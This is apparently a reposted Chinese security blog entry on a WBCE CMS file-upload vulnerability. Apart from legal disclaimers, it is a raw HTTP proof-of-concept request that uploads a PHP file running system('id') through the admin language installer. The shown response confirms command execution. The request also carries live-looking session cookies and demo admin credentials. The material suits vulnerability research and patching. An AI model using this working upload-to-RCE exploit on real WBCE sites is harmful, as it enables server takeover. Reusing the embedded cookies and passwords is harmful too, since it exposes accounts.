|
免责声明:本文所涉及的信息安全技术知识仅供参考和学习之用,并不构成任何明示或暗示的保证。读者在使用本文提供的信息时,应自行判断其适用性,并承担由此产生的一切风险和责任。本文作者对于读者基于本文内容所做出的任何行为或决定不承担任何责任。在任何情况下,本文作者不对因使用本文内容而导致的任何直接、间接、特殊或后果性损失承担责任。读者在使用本文内容时应当遵守当地法律法规,并保证不违反任何相关法律法规。 |
Version:1.0
poc&exp
POST /WBCE_CMSgn4fqnl8mv/admin/languages/install.php HTTP/1.1Host: demos6.softaculous.comCookie: _ga_YYDPZ3NXQQ=GS1.1.1701347353.1.1.1701349000.0.0.0; _ga=GA1.1.1562523898.1701347353; AEFCookies1526[aefsid]=jefkds0yos40w5jpbhl6ue9tsbo2yhiq; demo_390=%7B%22sid%22%3A390%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%5C%2Fadmin.php%22%2C%22dir_suffix%22%3A%22gwupshhfxk%22%7D; demo_549=%7B%22sid%22%3A549%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%5C%2Fadmin%5C%2F%22%2C%22dir_suffix%22%3A%22bybuxqthew%22%7D; demo_643=%7B%22sid%22%3A643%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%5C%2Fadmin%22%2C%22dir_suffix%22%3A%22gn4fqnl8mv%22%7D; phpsessid-5505-sid=576d8b8dd92f6cabe3a235cb359c9b34; WBCELastConnectJS=1701349503; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.phpContent-Type: multipart/form-data; boundary=---------------------------86020911415982314764024459Content-Length: 522Origin: https://demos6.softaculous.comDnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close-----------------------------86020911415982314764024459Content-Disposition: form-data; name="formtoken"5d3c9cef-003aaa0a62e1196ebda16a7aab9a0cf881b9370c-----------------------------86020911415982314764024459Content-Disposition: form-data; name="userfile"; filename="upgrade.php"Content-Type: application/x-php<?php echo system('id'); ?>-----------------------------86020911415982314764024459Content-Disposition: form-data; name="submit"-----------------------------86020911415982314764024459--### Response :<!-- ################### Up from here: Original Code from original template ########### --><!-- senseless positioning-table: needed for old modules which base on class td.content --><div class="row" style="overflow:visible"><div class="fg12"><table id="former_positioning_table"><tr><td class="content">uid=1000(soft) gid=1000(soft) groups=1000(soft)uid=1000(soft) gid=1000(soft) groups=1000(soft)<div class="top alertbox_error fg12 error-box"><i class=" fa fa-2x fa-warning signal"></i><p>Invalid WBCE CMS language file. Please check the text file.</p><p><a href="index.php" class="button">Back
原文始发于微信公众号(漏洞猎人):WBCE CMS | 文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论